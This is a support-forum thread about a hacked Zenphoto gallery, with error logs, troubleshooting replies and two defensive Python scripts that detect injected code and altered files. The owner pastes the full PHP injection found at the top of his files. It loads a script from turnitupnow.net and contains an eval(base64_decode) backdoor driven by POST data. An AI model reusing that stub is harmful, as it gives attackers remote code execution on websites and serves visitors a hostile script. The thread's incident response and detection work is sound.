Hi,
My Zen installation has been working fine, and then out of the blue, when I went to view it today, I got this:
"setup scripts missing"
It happens both when I try to access the Admin and the Live Gallery.
http://spoilertv.co.uk/images/zp-core/admin.php
http://spoilertv.co.uk/images/
As far as I know we've made no changes for a couple of weeks.
Any pointers/help would be great.
Comments
How do I see which files are missing?
This is what I see in the log.
I've no idea what any of this means
According to my investigation the index.php file has been modified a few hours later:
-rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
And the following is displayed in the error_log:
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
How do I see which files are missing?
http://pastebin.com/XTdb6aBc
I don't know what any of that means
In my error log I see:
Cannot modify header information - headers already sent by (output started at /home/**************/index.php:1) in /home/***************/zp-core/functions.php on line 1729
I can't view or login to the site.
Any ideas before I re-upload?
Thanks.
So again: After every install or upgrade you are requested to delete the setup files, /zp-core/setup.php and /zp-core/setup (folder) for security reasons. With 1.4.2 it will even do this automatically. This is what you probably did. Setup always runs automatically if the version changes. That happens for example if you upgrade (from nightly builds for example) or remove the htaccess file.
As said, reupload the files and let setup run.
Addition: If you think your root index.php file has been modified and should not have been, make sure your site/server has not been hacked. We currently have a topic about that: http://www.zenphoto.org/support/topic.php?id=9939#post-58237
You're missing the point.
This was an Install that had not been changed for several weeks.
Literally overnight this problem occurred.
I've had to re-install Zen to get it to work this morning.
What I am worried about is why this happened with NO Modifications on my part whilst I was actually asleep.
Does Zen Autoupdate itself with no user interaction?
Looking at my index, album and image php files I see this code added to the top of each file.
--
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
--
What is this?
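The stub posted above leaves a few stable markers in every file it is prepended to: the `$sessdt_` variable family, an `eval(base64_decode(...$_POST...))` hook, and the remote script host. The following is an added example (not Zenphoto code and not from the thread) that scans a directory of PHP files for those markers and, separately, lists files whose modification time is later than the last authorized upload, which is how the tampered index.php was spotted with `ls -l` here. The sample site, the file contents and the timestamps are constructed inline so it runs offline; the infected sample carries only the markers, not the full payload.

```python
"""Scan PHP files for the injection markers seen in this thread and for
unexpected modification times.  Added example; sample data is constructed."""
import os
import re
import tempfile
import time

# Indicators taken from the snippet posted in the thread.
SIGNATURES = {
    "sessdt_marker": re.compile(r"\$sessdt_[a-z]\b"),
    # eval(base64_decode(... $_POST[ ...  -- the remote-command hook
    "eval_b64_post": re.compile(r"eval\s*\(\s*base64_decode\s*\([^;]{0,200}\$_POST\["),
    "remote_script_host": re.compile(r"turnitupnow\.net"),
}


def scan_file(path):
    """Return the names of the signatures matched by one file ([] if clean)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


def scan_tree(root, exts=(".php",)):
    """Walk root; return {relative path: [signature names]} for files with hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(exts):
                continue
            full = os.path.join(dirpath, name)
            hits = scan_file(full)
            if hits:
                findings[os.path.relpath(full, root)] = hits
    return findings


def modified_since(root, since_epoch, exts=(".php",)):
    """Relative paths of files whose mtime is later than since_epoch."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                if os.stat(full).st_mtime > since_epoch:
                    out.append(os.path.relpath(full, root))
    return sorted(out)


def build_sample_site():
    """Constructed sample: a clean album.php (two weeks old) and an index.php
    that was rewritten yesterday with the thread's markers prepended.
    Returns (root, epoch of the last authorized upload)."""
    root = tempfile.mkdtemp(prefix="zp_scan_")
    two_weeks_ago = time.time() - 14 * 86400
    clean = "<?php\n// constructed clean theme file\necho 'gallery';\n"
    infected = (
        '<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_p = "showimg"; '
        'if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),'
        '$_POST[$sessdt_p])));exit;} }\n' + clean
    )
    samples = (
        ("album.php", clean, two_weeks_ago),
        ("index.php", infected, two_weeks_ago + 13 * 86400),
    )
    for name, body, mtime in samples:
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.utime(path, (mtime, mtime))
    last_authorized_upload = two_weeks_ago + 86400  # constructed
    return root, last_authorized_upload


if __name__ == "__main__":
    site, since = build_sample_site()
    for path, hits in scan_tree(site).items():
        print(f"{path}: {', '.join(hits)}")
    print("modified after last upload:", modified_since(site, since))
```

Run it against a real document root instead of the sample directory to get the list of files to reupload; a timestamp hit without a signature hit still deserves a look, because a stub can be rewritten to avoid these particular strings.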
The code you posted proves that apparently your site has been hacked. This might not have been Zenphoto's fault, but a permissions issue. Best contact your host as well.
However, as the thread I linked above tells, there was a security issue with the 3rd party file manager in 1.4.1.4 and older. Maybe they exploited that or not.
So I urge you to upgrade your site.
Looks like it must have been hacked.
I'm now on 1.4.1.5. Is that one secure?
Please contact your host as well as it might not have been Zenphoto's fault at all.
Do you have any idea what that code above does/did?
I'm now worried about using zen again after this.
There are several possibilities Zenphoto cannot do anything about for example:
- The file/folder permissions were not correct (what setting did you have?)
- The server itself has been hacked
Also your browser or computer system could have been infected and someone got the ftp password that way.
All other php outside of zen are fine.
Also I checked with the hosts and no Admin access with FTP or other was done since my last authorized upload yesterday. The files seem to have been updated via some SQL Injection (whatever that is).
Looks like something in zen 1.4.1.4 and below was insecure and hackers found a way in
Did you look at the zp-data folder? If permissions are not correct on that, the config file might have been hacked (note setup tries to set the permissions but cannot always do so depending on server config).
Which version was the original one on that site? Was that 1.4.1.4 or older?
I've upgraded now to 1.4.1.5
Permissions were all set correctly. It was a standard vanilla install.
Looking at the code that was injected into all php files it seems related to a bot attack via the tinymce.
I'm careful with my sites and have not experienced something like this before.
I don't know if the theme has anything to do with it but I'm using zpgallerific_v1.4.1.
I re-installed the whole of Zenphoto to remove the hacked code.
Do you have other services on your server? You might want to check the php files of those services to see if they were hacked as well
As said on another thread, several security sites had posted (and copied from each other as usual) this security issue, so maybe someone exploited that since naturally many people don't upgrade regularly.
Of course you can remove tinymce; it is just a plugin you should disable before doing so. You will then of course lose the text editor and have to add everything manually via plain html code.
I've deleted tinymce (didn't use it anyway).
I'll keep an eye on the server to make sure we don't get hit again.
When I reinstalled this site and brought up to date with 1.4.1.5 zenphoto found the following files which it suggested I remove but I don't know whether that's normal:
zp-core/tmp_2087833521026081.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/error_log
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/index.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php
zp-core/error_log
All files are correct except:
- "zp-core/tmp_2087833521026081.php": this one is not generated by Zenphoto, it might be from your server.
- "zp-core/error_log": don't know what that is, might be generated by your server. Zenphoto stores its log with a suffix .txt within zp-data.
- "zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php" is actually not a file that should be there.
Setup probably complains about the others because of the time stamp and "suggests" they might not be okay. It is not a file compare.
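Because setup flags files by time stamp rather than by content, the list above mixes legitimate files that were merely touched with files that should not exist at all. An added example (not Zenphoto's setup routine, and not from the thread) of the file compare that separates the two: hash a pristine unpacked copy of the same release, hash the deployed tree, and report paths that are added, modified or missing. Both trees, their contents and the file names used for the foreign files are constructed inline; the foreign names are the two the reply singles out.

```python
"""Content-hash comparison of a deployed tree against a pristine release.
Added example; both trees are constructed so it runs offline."""
import hashlib
import os
import tempfile


def hash_tree(root):
    """Return {relative path (with '/' separators): sha256 hex} for every file."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            digest = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    digest.update(chunk)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            manifest[rel] = digest.hexdigest()
    return manifest


def compare(pristine, deployed):
    """Return (added, modified, missing) as sorted lists of relative paths.
    added: only in the deployed tree; modified: same path, different hash;
    missing: shipped with the release but absent from the deployment."""
    added = sorted(p for p in deployed if p not in pristine)
    modified = sorted(p for p in pristine if p in deployed and pristine[p] != deployed[p])
    missing = sorted(p for p in pristine if p not in deployed)
    return added, modified, missing


def _write(root, rel, body):
    """Create rel (with parent directories) under root with the given text."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(body)


def build_sample_trees():
    """Constructed: a pristine release with three files and a deployed copy in
    which the file manager's index.php is unchanged (only its timestamp would
    differ), the root index.php was altered, and two foreign files appeared."""
    pristine = tempfile.mkdtemp(prefix="zp_release_")
    deployed = tempfile.mkdtemp(prefix="zp_deployed_")
    release = {
        "index.php": "<?php\n// constructed gallery front page\n",
        "zp-core/functions.php": "<?php\n// constructed core library\n",
        "zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/index.php":
            "<?php\n// constructed file manager entry point\n",
    }
    for rel, body in release.items():
        _write(pristine, rel, body)
        _write(deployed, rel, body)
    # Tampering and foreign files in the deployed copy only.
    _write(deployed, "index.php", "<?php /* constructed prepended stub */ ?>\n" + release["index.php"])
    _write(deployed, "zp-core/tmp_2087833521026081.php", "<?php // constructed foreign file\n")
    _write(deployed, "zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php",
           "<?php // constructed foreign file\n")
    return pristine, deployed


if __name__ == "__main__":
    pristine_root, deployed_root = build_sample_trees()
    added, modified, missing = compare(hash_tree(pristine_root), hash_tree(deployed_root))
    print("added:   ", added)
    print("modified:", modified)
    print("missing: ", missing)
```

Point `hash_tree` at a freshly unpacked release archive and at the live document root; anything in `added` or `modified` under zp-core is what to remove or reupload, while files that only show up in setup's timestamp list and in neither of those can be left alone.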
Presumably with comments now disabled and me the only one accessing the site the TINYMCE issue shouldn't be a problem if I keep it enabled for my convenience.